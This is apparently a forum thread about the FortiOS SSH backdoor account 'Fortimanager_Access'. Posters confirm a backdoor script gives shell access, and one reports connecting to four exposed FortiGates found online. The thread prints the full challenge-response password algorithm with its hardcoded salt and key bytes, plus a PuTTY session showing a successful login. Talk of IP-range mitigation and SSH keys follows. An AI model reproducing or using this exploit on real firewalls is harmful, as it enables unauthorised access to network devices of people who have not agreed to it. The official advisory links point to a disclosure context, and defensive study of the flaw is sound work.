I have tried the script out there and have not been able to get it to work.  Until we get some answer from Fortinet I'm going to keep at it.

Tried it on a 5.0.7 version and it works.

The script logs in without any password prompt

Official statements:

http://www.fortiguard.com/advisory/fortios-ssh-undocumented-interactive-login-vulnerability

http://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios

Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs automatically...

~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200 FortiGate-VM64 # get sys status Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6) Virus-DB: 16.00560(2012-10-19 08:31) Extended DB: 1.00000(2012-10-17 15:46) IPS-DB: 4.00345(2013-05-23 00:39) IPS-ETDB: 0.00000(2001-01-01 00:00) Serial-Number: FGVMEV0000000000

I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...

I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).

Thanks for sharing Mike.

I've got mixed result. This one works:

Version: FortiGate-VM64 v5.0,build0128,121101 (GA)

But I was unable to access my FG-111C:

Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)

Don't know.. maybe it's because I did a downgrade from 5.2. Or they have different salts.

For those who don't want to dig too deep into this.

This is all the magic:

If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.

Then you can calculate the dynamic password based on this dword challenge:

n = $SSH_Challenge
m = $SHA1_Generator

m.add('\x00' * 12)
m.add(n + 'FGTAbc11*xy+Qqz27')
m.add('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.sha1digest())

Putty:

login as: Fortimanager_Access

Using keyboard-interactive authentication. -840056459

Access denied

Using keyboard-interactive authentication. -1914958026

Access denied

Using keyboard-interactive authentication. -1378285763

AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=

FortiGate-VM64 #

This only works, if you have a SSH access. So by limiting the ip ranges for all admin users, you can mitigate the threat.

If you enable a ssh key it seems like it results in a fix . Can anybody confirm this on there FGT? ( upload a ssh key  from the CLI and retest )

Like this?

login as: admin Authenticating with public key "rsa-key-20160113"

FortiGate-VM64 # conf sys admin

FortiGate-VM64 (admin) # show

config system admin

  edit "admin"

     set accprofile "super_admin"

     set vdom "root"

     set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps                                                                                                           9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"

     config dashboard-tabs

        <snip>

     end

     config dashboard

        <snip>

     end

     set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=

  next

end

FortiGate-VM64 (admin) #

Still able to access with the FortiManager user.